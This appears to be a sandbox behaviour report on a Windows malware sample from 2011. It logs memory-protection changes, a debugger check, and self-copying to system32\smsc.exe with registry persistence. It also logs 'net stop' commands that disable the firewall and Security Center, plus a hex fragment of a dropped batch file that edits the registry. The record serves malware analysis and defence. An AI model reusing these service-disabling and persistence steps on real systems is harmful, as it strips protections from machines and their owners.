Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416278 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585888068
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41668C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585888273
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41620C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585889232
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416210 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585889455
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4166A0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585889659
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4162D0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585891043
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4166B4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585891261
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416110 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585891550
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416114 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585892486
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416118 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585892826
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41611C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585893031
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416120 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585893439
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416124 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585893650
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416128 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585893860
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41612C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585894260
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416130 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585894559
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4166C8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585894762
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416140 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585895268
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416144 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585895484
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416148 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585895745
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41614C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585896148
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416150 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585896359
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416154 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585896562
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416158 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585896960
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41615C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585897171
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416160 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585897376
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416164 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585897773
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416168 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585897987
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41616C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585898189
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416170 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585898588
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416174 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585898798
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416178 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585899001
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41617C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585899398
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416180 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585899609
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416184 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585899810
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416188 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585900206
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41618C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585900418
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416190 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585900621
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416194 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585901018
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416198 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585901229
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41619C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585901431
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161A0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585901829
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161A4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585902039
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161A8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585902241
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161AC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585902638
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161B0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585902849
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161B4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585903051
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161B8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585903447
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161BC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585903656
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161C0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585903914
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161C4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585904314
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161C8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585904524
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161CC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585904725
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161D0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585905122
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161D4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585905429
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161D8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585905637
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161DC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585906041
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161E0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585906226
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161E4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585907691
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161E8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585907902
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161EC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585908107
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161F0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585908517
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161F4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585908724
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161F8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585908927
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4161FC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585909331
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416200 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585909540
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416204 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585909744
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4166DC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585911277
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416008 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585911498
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41600C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585911712
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416010 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585912126
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416014 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585912335
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416018 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585912539
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41601C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585912959
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416020 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585913168
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416024 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585913372
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416028 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585913778
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41602C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585913986
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416030 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585914189
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416034 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585914592
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416038 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585914799
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41603C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585915061
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416040 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585915467
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416044 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585915674
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416048 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585915877
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41604C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585916279
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416050 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585916487
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416054 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585916690
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416058 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585917144
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41605C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585917352
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416060 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585917560
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416064 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585917972
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416068 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585918181
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41606C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585918385
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416070 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585918788
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416074 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585918996
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416078 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585919229
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41607C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585919646
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416080 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585919854
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416084 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585920058
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416088 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585920462
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41608C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585920670
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416090 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585920894
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416094 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585921307
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416098 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585921513
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 41609C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585921716
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160A0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585922285
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160A4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585922540
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160A8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585922746
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160AC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585923216
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160B0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585923433
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160B4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585923637
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160B8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585924104
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160BC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585924313
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160C0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585924516
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160C4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585924923
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160C8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585925130
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160CC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585925333
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160D0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585925737
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160D4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585925944
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160D8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585926147
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160DC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585926551
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160E0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585926758
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160E4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585927013
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160E8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585927420
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160EC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585927626
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160F0 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585927830
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160F4 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585928274
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160F8 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585928483
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 4160FC Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585928688
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416100 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585929095
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416104 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585929304
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 416108 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write	success or wait	1585929508
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 400000 Length: 1000 New Protection: page execute and read and write New Protection: page readonly	success or wait	1585929911
Memory attributes changed	PID: 808 Path: C:\binary.exe Base: 400000 Length: 1000 New Protection: page readonly New Protection: NULL	access violation	1585930232
System info queried	Type: KernelDebuggerInformation	success or wait	1585934909
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_Temporary Internet Files_Content.IE5_index.dat_81920 Access: write Type: image Baseaddress: BF0000 Size: 81920 Protection: read write Mapped to pid: own pid	success or wait	1586000687
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Cookies_index.dat_32768 Access: write Type: image Baseaddress: 3F0000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1586007375
Section loaded	Path: \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_index.dat_32768 Access: write Type: image Baseaddress: C10000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1586014178
Section loaded	Path: C:\WINDOWS\system32\icmp.dll Access: query and write and read and execute Type: image Baseaddress: 74290000 Size: 16384 Protection: read write Mapped to pid: own pid	success or wait	1586133614
Section loaded	Path: C:\WINDOWS\system32\dnsapi.dll Access: query and write and read and execute Type: image Baseaddress: 76F20000 Size: 159744 Protection: read write Mapped to pid: own pid	success or wait	1586145848
Section loaded	Path: C:\WINDOWS\system32\odbc32.dll Access: query and write and read and execute Type: image Baseaddress: 74320000 Size: 249856 Protection: read write Mapped to pid: own pid	success or wait	1586181155
Section loaded	Path: \KnownDlls\comdlg32.dll Access: write and read and execute Type: image Baseaddress: 763B0000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1586184920
Section loaded	Path: C:\WINDOWS\system32\odbcint.dll Access: write and read and execute Type: commit Baseaddress: D20000 Size: 94208 Protection: execute Mapped to pid: own pid	success or wait	1586209752
Section loaded	Path: C:\WINDOWS\system32\odbcint.dll Access: query and write and read and execute Type: image Baseaddress: D20000 Size: 94208 Protection: read write Mapped to pid: own pid	image not at base	1586213559
Section loaded	Path: C:\WINDOWS\system32\odbcint.dll Access: query and write and read and execute Type: image Baseaddress: D20000 Size: 94208 Protection: read write Mapped to pid: own pid	conflicting addresses	1586214720
Section loaded	Path: C:\WINDOWS\system32\psapi.dll Access: query and write and read and execute Type: image Baseaddress: 76BF0000 Size: 45056 Protection: read write Mapped to pid: own pid	success or wait	1586223733
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: image Baseaddress: D40000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1586231176
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: D50000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1586234205
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1586236659
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: D50000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1586241808
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1586255900
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: E80000 Size: 389120 Protection: execute Mapped to pid: own pid	success or wait	1586261653
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: E80000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	1586263923
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: E80000 Size: 389120 Protection: execute Mapped to pid: own pid	success or wait	1586268653
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: E80000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	1586270628
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: D50000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	1586299854
Process created	PID: 1976 Path: C:\WINDOWS\system32\cmd.exe Cmdline: cmd /c net stop SharedAccess Createflags: 0	success or wait	1586304135
File created	Path: c:\sdfeww.bat Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false	success or wait	1588861535
File write	Path: C:\sdfeww.bat Offset: none Length: 1350 Value: 40 65 63 68 6F 20 6F 66 66 0D 0A 45 63 68 6F 20 52 45 47 45 44 49 54 34 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D	success or wait	1588866821
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: D60000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1588892868
Section loaded	Path: C:\sdfeww.bat Access: query and read Type: commit Baseaddress: D60000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1588913353
Process created	PID: 1188 Path: C:\WINDOWS\system32\cmd.exe Cmdline: cmd /c c:\sdfeww.bat Createflags: suspended	success or wait	1588916851
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: D60000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1591053772
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: E90000 Size: 389120 Protection: execute Mapped to pid: own pid	success or wait	1591071110
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: E90000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	1591079455
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: E90000 Size: 389120 Protection: execute Mapped to pid: own pid	success or wait	1591096594
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: E90000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	1591100168
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: D60000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	1591136948
Process created	PID: 1960 Path: C:\WINDOWS\system32\cmd.exe Cmdline: cmd /c net stop Security Center Createflags: 0	success or wait	1591141303
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: D60000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1593530798
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: E90000 Size: 389120 Protection: execute Mapped to pid: own pid	success or wait	1593669335
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: E90000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	1593678663
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: E90000 Size: 389120 Protection: execute Mapped to pid: own pid	success or wait	1593705543
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: E90000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	1593714643
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: D60000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	1593772745
Process created	PID: 252 Path: C:\WINDOWS\system32\cmd.exe Cmdline: cmd /c net start SharedAccess Createflags: 0	success or wait	1593780606
File copied	From: C:\binary.exe to: C:\WINDOWS\system32\smsc.exe	success or wait	1596353917
Section loaded	Path: C:\binary.exe Access: query and write and read and execute and extend size Type: commit Baseaddress: D60000 Size: 53248 Protection: readonly Mapped to pid: own pid	success or wait	1596437592
Key value queried	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: Shell	success or wait	1596502718
File opened	Path: C:\WINDOWSExplorer.exe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	12F654	1596506039
Key value set	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions Name: systemdates Type: String Data: C:\binary.exe	success or wait	1596543343
Process terminated	PID: 808 Path: C:\binary.exe	success or wait	1612117035

Analysis File: cmd.exe PID: 1976 Parent PID: 808

Sections

General
Start time:	07:41:11
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\cmd.exe
Commandline:	cmd /c net stop SharedAccess
Imagebase:	0x4ad00000
File size:	389120 bytes
MD5 hash:	6D778E0F95447E6546553EEEA709D03C

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	270000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	290000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	2E0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	330000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
